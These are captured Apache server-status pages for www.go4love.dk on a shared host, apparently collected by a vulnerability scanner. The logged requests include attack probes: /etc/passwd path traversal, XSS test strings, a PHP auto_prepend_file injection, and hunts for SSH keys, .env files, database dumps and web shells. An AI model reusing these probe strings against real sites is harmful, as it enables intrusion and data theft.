13.39.16.76webhotel5.webhosting.dkGET /wp-admin/click.php HTTP/1.0 40-8-0/0/419. 0.10269900.00.000.14 17.241.227.226webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 41-7-0/0/355. 0.03497300.00.000.29 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-7-0/0/352. 0.04497300.00.000.14 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-7-0/0/355. 0.03497300.00.000.29 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-7-0/0/353. 0.03497300.00.000.25 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-7-0/0/354. 0.02497300.00.000.17 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 46-7-0/0/263. 0.03497300.00.000.10 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 47-7-0/0/218. 0.03497300.00.000.16 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 48-7-0/0/224. 0.03497300.00.000.08 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 49-7-0/0/118. 0.05497300.00.000.05 105.27.126.74webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 50-7-0/0/21. 0.03497300.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 51-7-0/0/21.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3e9e3ad79
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 14-Nov-2024 11:54:29 CET Restart Time: Thursday, 14-Nov-2024 06:05:04 CET Parent Server Generation: 5 Server uptime: 5 hours 49 minutes 25 seconds Total accesses: 52494 - Total Traffic: 21.3 MB CPU Usage: u1.64 s.68 cu0 cs0 - .0111% CPU load 2.5 requests/sec - 1065 B/second - 425 B/request 1 requests currently being processed, 31 idle workers ___________W__.______________._...__.._......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-5316560/12/1481_ 0.02000.00.000.44 142.93.143.8webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 1-5309690/14/1413_ 0.01000.00.000.41 142.93.143.8webhotel5.webhosting.dkGET /server HTTP/1.0 2-5311630/14/1461_ 0.025270.00.001.62 157.250.160.25www.valloe.orgGET /motor/lm07214.htm HTTP/1.0 3-5309780/15/1477_ 0.01000.00.000.41 142.93.143.8webhotel5.webhosting.dkGET /about HTTP/1.0 4-5317420/11/1412_ 0.003100.00.000.49 147.78.47.243webhotel5.webhosting.dkPOST /blog/xmlrpc.php HTTP/1.0 5-5311640/11/1394_ 0.01700.00.000.49 213.153.89.7webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 6-5311650/13/1404_ 0.00300.00.001.84 114.119.133.108webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 7-5313180/13/1342_ 0.00000.00.000.45 142.93.143.8webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 8-5313700/11/1405_ 0.003300.00.001.62 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-5310680/12/1428_ 0.01000.00.000.40 142.93.143.8webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 10-5309790/13/1406_ 0.01000.00.000.42 142.93.143.8webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 11-5313710/11/1432W 0.01000.00.000.39 142.93.143.8webhotel5.webhosting.dkGET /server-status HTTP/1.0 12-5314090/12/1436_ 0.012800.00.000.46 155.248.250.253webhotel5.webhosting.dkPOST /scripts/setup.php HTTP/1.0 13-5311170/14/1384_ 0.014000.00.000.37 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-5-0/0/1350. 0.0513100.00.000.39 34.69.129.75webhotel5.webhosting.dkGET /xn--alu-0na.dk.sql.lz HTTP/1.0 15-5314100/12/1412_ 0.012700.00.000.45 155.248.250.253webhotel5.webhosting.dkPOST /axis2/axis2-admin/login HTTP/1.0 16-5314110/11/1423_ 0.001100.00.000.42 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-5311180/13/1364_ 0.002900.00.000.39 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-5311370/13/1309_ 0.012800.00.000.37 155.248.250.253webhotel5.webhosting.dkPOST /login.action HTTP/1.0 19-5317430/10/1362_ 0.003000.00.000.43 34.69.129.75webhotel5.webhosting.dkGET /backup_3.war HTTP/1.0 20-5311380/12/1359_ 0.012700.00.000.49 155.248.250.253webhotel5.webhosting.dkGET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.0 21-5314120/12/1357_ 0.00700.00.000.39 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-5311390/13/1256_ 0.011000.00.000.39 145.239.10.137webhotel5.webhosting.dkGET /core3.php HTTP/1.0 23-5311400/12/1306_ 0.011000.00.000.37 145.239.10.137webhotel5.webhosting.dkGET /htaccess.php HTTP/1.0 24-5317850/11/1312_ 0.002700.00.000.38 155.248.250.253webhotel5.webhosting.dkPOST /axis2-admin/login HTTP/1.0 25-5311660/13/1269_ 0.014640.00.002.11 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 26-5317860/11/1207_ 0.011759830.00.000.33 87.250.224.79webhotel5.webhosting.dkGET /en/model/detail/Emma-Cummings-1210 HTTP/1.0 27-5317870/11/1213_ 0.001750320.00.000.32 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-5317880/11/1127_ 0.001000.00.000.37 145.239.10.137webhotel5.webhosting.dkGET /www.php HTTP/1.0 29-5-0/0/1071. 0.0614100.00.000.38 34.69.129.75webhotel5.webhosting.dkGET /package.sql.bz2 HTTP/1.0 30-5311670/13/1088_ 0.01150.00.000.31 142.93.143.8webhotel5.webhosting.dkGET / HTTP/1.0 31-5-0/0/1022. 0.0513500.00.000.31 34.69.129.75webhotel5.webhosting.dkGET /backup_3.sql.gz HTTP/1.0 32-5-0/0/909. 0.0614000.00.000.28 34.69.129.75webhotel5.webhosting.dkGET /ftp.sql.bz2 HTTP/1.0 33-5-0/0/855. 0.0513400.00.000.23 34.69.129.75webhotel5.webhosting.dkGET /bin.sql.gz HTTP/1.0 34-5311680/12/908_ 0.01340.00.000.28 192.46.211.230webhotel5.webhosting.dkGET / HTTP/1.0 35-5311690/13/790_ 0.01040.00.000.21 142.93.143.8webhotel5.webhosting.dkGET / HTTP/1.0 36-5-0/0/827. 0.0513300.00.000.23 34.69.129.75webhotel5.webhosting.dkGET /database.sql.gz HTTP/1.0 37-5-0/0/739. 0.0513300.00.000.20 34.69.129.75webhotel5.webhosting.dkGET /dump.sql.gz HTTP/1.0 38-5311700/13/700_ 0.01000.00.000.20 142.93.143.8webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 39-5-0/0/544. 0.0735800.00.000.15 34.69.129.75webhotel5.webhosting.dkGET /backups.rar HTTP/1.0 40-5-0/0/498. 0.0837110.00.000.14 35.225.200.18webhotel5.webhosting.dkPOST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.0 41-5-0/0/442. 0.0636600.00.000.15 34.69.129.75webhotel5.webhosting.dkGET /.ssh/id_dsa HTTP/1.0 42-5-0/0/441. 0.1037100.00.000.12 35.225.200.18webhotel5.webhosting.dkPOST /WS/Basic/Basic.asmx HTTP/1.0 43-5-0/0/444. 0.0937100.00.000.12 34.69.129.75webhotel5.webhosting.dkPOST /WEB_VMS/LEVEL15/ HTTP/1.0 44-5-0/0/445. 0.0414600.00.000.23 34.69.129.75webhotel5.webhosting.dkGET /html.sql.bz2 HTTP/1.0 45-5-0/0/339. 0.0513900.00.000.10 127.0.0.1webhotel5.webhosting.dkGET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.0 46-5-0/0/197. 0.09119030.00.000.05 108.162.245.85webhotel5.webhosting.dkGET /?find-new%2F2640796%2Fposts HTTP/1.0 47-0-0/0/47. 0.081775500.00.000.01 35.239.99.222webhotel5.webhosting.dkGET /xn--alu-0na.dk.war HTTP/1.0 48-0-0/0/49. 0.071775800.00.000.01 34.136.117.226webhotel5.webhosting.dkGET /collibra.properties HTTP/1.0 49-0-0/0/48. 0.061775800.00.000.01 34.136.117.226webhotel5.webhosting.dkGET /.env.old HTTP/1.0 50-0-0/0/50. 0.081775400.00.000.01 34.136.117.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde304381af4
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 12-Nov-2024 10:50:41 CET Restart Time: Tuesday, 12-Nov-2024 06:05:04 CET Parent Server Generation: 4 Server uptime: 4 hours 45 minutes 37 seconds Total accesses: 23016 - Total Traffic: 14.7 MB CPU Usage: u.98 s.18 cu0 cs0 - .00677% CPU load 1.34 requests/sec - 898 B/second - 669 B/request 1 requests currently being processed, 36 idle workers ______________._____W_________________.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-4408780/10/701_ 0.01110.00.001.77 127.0.0.1webhotel5.webhosting.dkGET /storage/logs/laravel.log HTTP/1.0 1-4414180/9/698_ 0.001500.00.020.18 127.0.0.1webhotel5.webhosting.dkyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E HTTP/1.0 2-4415170/11/705_ 0.031410.00.000.25 94.23.207.193www.valloe.orgGET /motor/ssr0606.htm HTTP/1.0 3-4417850/10/700_ 0.021000.00.000.28 5.255.231.103webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 4-4407790/9/697_ 0.00510.00.000.31 157.250.160.11webhotel5.webhosting.dkGET / HTTP/1.0 5-4408420/12/700_ 0.03130.00.000.44 139.59.136.184webhotel5.webhosting.dkGET / HTTP/1.0 6-4415430/9/702_ 0.011000.00.000.22 127.0.0.1webhotel5.webhosting.dkg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E HTTP/1.0 7-4408430/10/695_ 0.03100.00.000.25 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-4415440/10/703_ 0.014530.00.000.20 198.235.24.245webhotel5.webhosting.dkGET / HTTP/1.0 9-4408790/12/696_ 0.02030.00.000.25 139.59.136.184webhotel5.webhosting.dkGET / HTTP/1.0 10-4408800/11/704_ 0.03000.00.000.37 139.59.136.184webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 11-4417860/9/697_ 0.02500.00.000.47 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 12-4408810/11/697_ 0.02000.00.001.46 139.59.136.184webhotel5.webhosting.dkGET /server HTTP/1.0 13-4417840/10/697_ 0.011500.00.000.24 155.248.250.253webhotel5.webhosting.dkGET /.dockercfg HTTP/1.0 14-4-0/0/686. 0.1134032500.00.000.35 162.158.41.56webhotel5.webhosting.dkGET /?find-new%2F2050377%2Fposts HTTP/1.0 15-4419110/8/690_ 0.011060.00.000.31 127.0.0.1webhotel5.webhosting.dkGET /?q=./gibbon.sql HTTP/1.0 16-4409230/11/689_ 0.02000.00.000.20 139.59.136.184webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 17-4409240/11/640_ 0.00000.00.000.21 139.59.136.184webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 18-4351020/38/629_ 0.121500.00.010.25 127.0.0.1webhotel5.webhosting.dkGET /secure/ViewUserHover.jspa HTTP/1.0 19-4409250/11/606_ 0.01000.00.000.21 139.59.136.184webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 20-4409260/10/601W 0.01000.00.010.62 139.59.136.184webhotel5.webhosting.dkGET /server-status HTTP/1.0 21-4409270/11/598_ 0.012400.00.002.40 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-4409280/11/641_ 0.022430.00.000.31 94.23.207.193www.valloe.orgGET /motor/ssr0604.htm HTTP/1.0 23-4409290/11/624_ 0.022230.00.000.23 155.248.250.253webhotel5.webhosting.dk3Cimg%20src=a%20onerror=alert(document.domain)%3Evh217 HTTP/1.0 24-4409300/11/605_ 0.012200.00.000.64 155.248.250.253webhotel5.webhosting.dkGET /static/etc/passwd HTTP/1.0 25-4419140/9/584_ 0.011000.00.000.16 155.248.250.253webhotel5.webhosting.dkGET /.docker/config.json HTTP/1.0 26-4419150/9/589_ 0.00900.00.000.18 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 27-4419200/8/658_ 0.01700.00.000.19 87.250.224.50webhotel5.webhosting.dk-content/uploads/2019/03/cropped-favicon_003-32x32.png HTTP/1.0 28-4373860/24/587_ 0.06110.00.010.24 94.23.207.193www.valloe.orgGET /motor/ssr0608.htm HTTP/1.0 29-4419210/8/492_ 0.01840.00.000.13 94.23.207.193www.valloe.orgGET /motor/ssr0607.htm HTTP/1.0 30-4419220/9/493_ 0.01800.00.000.16 54.36.148.176webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 31-4419230/8/490_ 0.00250.00.000.19 127.0.0.1webhotel5.webhosting.dkcontroller=../../../../../../../../../../etc/passwd%00 HTTP/1.0 32-4373890/24/476_ 0.05000.00.010.15 139.59.136.184webhotel5.webhosting.dkGET /about HTTP/1.0 33-4373900/25/379_ 0.06000.00.010.28 139.59.136.184webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 34-4373950/25/409_ 0.062100.00.010.10 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 35-4373960/23/265_ 0.051710.00.000.06 94.23.207.193www.valloe.orgGET /motor/ssr0605.htm HTTP/1.0 36-4373970/23/262_ 0.041500.00.000.07 52.167.144.137webhotel5.webhosting.dkGET /sitemaps.xml HTTP/1.0 37-4373980/25/250_ 0.0715850.00.010.28 149.28.235.137webhotel5.webhosting.dkGET / HTTP/1.0 38-4-0/0/182. 0.08167100.00.000.04 52.237.219.189webhotel5.webhosting.dkHEAD /backup HTTP/1.0 39-3-0/0/99. 0.07448400.00.000.02 152.42.249.104webhotel5.webhosting.dkGET /2021/wp-includes/wlwmanifest.xml HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde33765eabe
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 04-Nov-2024 17:51:00 CET Restart Time: Monday, 04-Nov-2024 16:10:06 CET Parent Server Generation: 1 Server uptime: 1 hour 40 minutes 54 seconds Total accesses: 7564 - Total Traffic: 5.8 MB CPU Usage: u1.47 s.69 cu0 cs0 - .0357% CPU load 1.25 requests/sec - 999 B/second - 799 B/request 1 requests currently being processed, 31 idle workers ____________________.._W_____...._____.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1459010/21/235_ 0.065200.00.010.11 52.140.247.98webhotel5.webhosting.dkHEAD /home HTTP/1.0 1-1458260/23/236_ 0.060100.00.010.09 68.183.9.16webhotel5.webhosting.dkGET / HTTP/1.0 2-1461720/20/238_ 0.03000.00.010.64 68.183.9.16webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 3-1458950/21/237_ 0.035300.00.010.10 100.28.57.133webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 4-1459350/21/234_ 0.043400.00.010.17 75.74.123.212webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 5-1459080/21/238_ 0.064870.00.010.11 155.248.250.253webhotel5.webhosting.dkPOST /?gf_page=upload HTTP/1.0 6-1459360/22/237_ 0.043400.00.010.15 216.244.66.202webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 7-1459020/21/237_ 0.054800.00.010.11 127.0.0.1webhotel5.webhosting.dkGET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.0 8-1459370/22/237_ 0.042840.00.010.16 43.131.248.209www.brandstation.infoGET / HTTP/1.0 9-1459090/21/237_ 0.0546950.00.010.10 15.235.15.135webhotel5.webhosting.dkGET / HTTP/1.0 10-1459380/21/236_ 0.0630130.00.010.15 155.248.250.253webhotel5.webhosting.dkPOST / HTTP/1.0 11-1459860/21/238_ 0.04000.00.010.12 68.183.9.16webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 12-1459930/20/234_ 0.045300.00.010.29 52.140.247.98webhotel5.webhosting.dkHEAD /backup HTTP/1.0 13-1462240/19/231_ 0.03170.00.010.08 68.183.9.16webhotel5.webhosting.dkGET / HTTP/1.0 14-1459940/21/236_ 0.045300.00.010.10 52.140.247.98webhotel5.webhosting.dkHEAD /old HTTP/1.0 15-1462270/19/232_ 0.04000.00.010.10 68.183.9.16webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 16-1459980/21/235_ 0.035200.00.010.16 52.140.247.98webhotel5.webhosting.dkHEAD /new HTTP/1.0 17-1459990/21/235_ 0.035210.00.010.09 3.235.215.92webhotel5.webhosting.dkGET /fyn/ HTTP/1.0 18-1462280/19/234_ 0.04010.00.010.09 68.183.9.16webhotel5.webhosting.dkGET /about HTTP/1.0 19-1477080/6/221_ 0.005200.00.000.12 52.140.247.98webhotel5.webhosting.dkHEAD /main HTTP/1.0 20-1-0/0/216. 0.1130910.00.000.16 45.92.229.169www.team-otte.dkGET /.well-known/pki-validation/ HTTP/1.0 21-1-0/0/215. 0.0929000.00.000.12 45.92.229.169www.team-otte.dkGET /xt/index.php HTTP/1.0 22-1407480/47/211_ 0.12000.00.020.09 68.183.9.16webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 23-1407530/46/212W 0.10000.00.020.08 68.183.9.16webhotel5.webhosting.dkGET /server-status HTTP/1.0 24-1458310/23/188_ 0.05000.00.010.08 68.183.9.16webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 25-1458320/23/188_ 0.06000.00.010.12 68.183.9.16webhotel5.webhosting.dkGET /server HTTP/1.0 26-1459100/22/189_ 0.054610.00.010.07 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 27-1460000/20/183_ 0.055180.00.010.10 155.248.250.253webhotel5.webhosting.dkGET /?gf_page=upload HTTP/1.0 28-1460010/20/186_ 0.054910.00.010.07 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-1-0/0/164. 0.1232310.00.000.09 45.92.229.169www.team-otte.dkGET /wp-admin/images/index.php HTTP/1.0 30-1-0/0/164. 0.1132020.00.000.06 45.92.229.169www.team-otte.dkGET /b.php HTTP/1.0 31-1-0/0/151. 0.1131910.00.001.47 45.92.229.169www.team-otte.dkGET /404.php HTTP/1.0 32-1-0/0/146. 0.1131820.00.000.06 45.92.229.169www.team-otte.dkGET /moon.php HTTP/1.0 33-1459110/21/121_ 0.033710.00.010.04 155.248.250.253webhotel5.webhosting.dkPOST /cgibin/webproc HTTP/1.0 34-1459390/22/122_ 0.042700.00.010.04 75.74.123.212webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 35-1459400/21/69_ 0.062300.00.010.02 136.33.16.86webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 36-1459410/22/71_ 0.053120.00.010.02 81.19.232.105www.valloe.orgGET /motor/lm07281.htm HTTP/1.0 37-1459420/22/70_ 0.04130.00.010.03 81.19.232.105www.valloe.orgGET /motor/lm07297.htm HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3bc1fa438
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 02-Nov-2024 12:49:46 CET Restart Time: Saturday, 02-Nov-2024 06:10:03 CET Parent Server Generation: 6 Server uptime: 6 hours 39 minutes 43 seconds Total accesses: 37181 - Total Traffic: 22.1 MB CPU Usage: u3 s1.33 cu0 cs0 - .0181% CPU load 1.55 requests/sec - 966 B/second - 623 B/request 1 requests currently being processed, 31 idle workers __W_____________________________................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-6401610/30/1077_ 0.085570.00.081.85 137.184.120.172webhotel5.webhosting.dkGET / HTTP/1.0 1-6404240/23/1066_ 0.07000.00.050.65 206.189.19.19webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 2-6404260/22/1066W 0.07000.00.020.49 206.189.19.19webhotel5.webhosting.dkGET /server-status HTTP/1.0 3-6404250/23/1064_ 0.05000.00.052.28 206.189.19.19webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 4-6404270/22/1064_ 0.085470.00.010.44 192.104.34.34webhotel5.webhosting.dkGET / HTTP/1.0 5-6404280/22/1062_ 0.074900.00.010.39 137.184.120.172webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 6-6404210/23/956_ 0.083100.00.010.32 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-6404290/22/1004_ 0.074600.00.010.32 188.132.140.76webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 8-6404300/22/1005_ 0.0746100.00.010.50 205.210.31.22webhotel5.webhosting.dkGET / HTTP/1.0 9-6404310/21/1004_ 0.084600.00.010.36 127.0.0.1webhotel5.webhosting.dkGET / HTTP/1.0 10-6404320/22/1006_ 0.0546150.00.010.34 81.19.232.105www.echwald.comGET / HTTP/1.0 11-6404330/22/1005_ 0.07401020.00.000.45 54.202.224.89webhotel5.webhosting.dkGET / HTTP/1.0 12-6404340/22/957_ 0.06411050.00.010.30 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 13-6404350/22/957_ 0.09371040.00.010.32 54.213.129.53webhotel5.webhosting.dkGET / HTTP/1.0 14-6404360/22/1006_ 0.053310.00.040.39 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 15-6404370/22/973_ 0.103100.00.011.70 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-6404390/22/1007_ 0.083100.00.010.31 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-6404400/22/951_ 0.063100.00.010.36 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-6404410/22/948_ 0.062400.00.010.36 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 19-6404420/22/997_ 0.092160.00.010.39 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 20-6404430/22/946_ 0.07710.00.010.36 81.19.232.105www.qwist.dkGET / HTTP/1.0 21-6404440/22/945_ 0.05300.00.020.39 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-6404450/22/981_ 0.06770.00.010.44 198.235.24.22webhotel5.webhosting.dkGET / HTTP/1.0 23-6404460/22/885_ 0.07160.00.000.35 206.189.19.19webhotel5.webhosting.dkGET / HTTP/1.0 24-6404470/22/938_ 0.09060.00.010.40 206.189.19.19webhotel5.webhosting.dkGET / HTTP/1.0 25-6404480/22/988_ 0.05000.00.010.36 206.189.19.19webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 26-6404490/22/887_ 0.04000.00.010.29 206.189.19.19webhotel5.webhosting.dkGET /server HTTP/1.0 27-6404500/22/937_ 0.07000.00.010.39 206.189.19.19webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 28-6404510/22/939_ 0.05000.00.030.38 206.189.19.19webhotel5.webhosting.dkGET /about HTTP/1.0 29-6404520/22/988_ 0.07000.00.020.45 161.12.48.130webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 30-6404530/22/837_ 0.07000.00.021.29 206.189.19.19webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 31-6404540/21/800_ 0.045600.00.010.29 137.184.120.172webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 32-6-0/0/736. 0.12150600.00.000.34 74.179.83.250webhotel5.webhosting.dkGET /wp-includes/IXR/themes.php HTTP/1.0 33-6-0/0/667. 0.09150700.00.001.62 74.179.83.250webhotel5.webhosting.dkGET /wp-includes/class-simplepie.php HTTP/1.0 34-6-0/0/607. 0.09142000.00.000.27 74.179.83.250webhotel5.webhosting.dkGET /cache-wordpress/ HTTP/1.0 35-6-0/0/445. 0.08142000.00.000.14 74.179.83.250webhotel5.webhosting.dkGET /wp-content/uploads/2022/ HTTP/1.0 36-6-0/0/403. 0.09141900.00.000.13 74.179.83.250webhotel5.webhosting.dkGET /wp-content/plugins/cekidot/ HTTP/1.0 37-6-0/0/402. 0.091419990.00.000.11 44.243.100.33webhotel5.webhosting.dkGET / HTTP/1.0 38-6-0/0/294. 0.11141900.00.000.15 74.179.83.250webhotel5.webhosting.dkGET /wp-content/plugins/db/ HTTP/1.0 39-6-0/0/291. 0.09141900.00.000.13 74.179.83.250webhotel5.webhosting.dkGET /wp-content/plugins/home/ HTTP/1.0 40-6-0/0/291. 0.08141800.00.000.13 74.179.83.250webhotel5.webhosting.dkGET /wp-content/plugins/owfsmac/ HTTP/1.0 41-6-0/0/250. 0.08141900.00.000.07 74.179.83.250webhotel5.webhosting.dkGET /wp-content/plugins/limit/ HTTP/1.0 42-6-0/0/250. 0.09141800.00.000.07 74.179.83.250webhotel5.webhosting.dkGET /wp-content/plugins/prenota/ HTTP/1.0 43-6-0/0/250. 0.09141810.00.000.12 74.179.83.250webhotel5.webhosting.dkGET /wp-content/plugins/Uwogh-Segs/ HTTP/1.0 44-6-0/0/250. 0.08141800.00.000.08 74.179.83.250webhotel5.webhosting.dkGET /wp-content/plugins/wp-diambar/includes/ HTTP/1.0 45-6-0/0/149. 0.08141800.00.000.04 74.179.83.250webhotel5.webhosting.dkGET /wp-content/plugins/wp-freeform/ HTTP/1.0 46-6-0/0/150. 0.09141800.00.000.04 74.179.83.250webhotel5.webhosting.dkGET /wp-content/plugins/wp-hps/sh/ HTTP/1.0 47-5-0/0/100. 0.10441210.00.000.03 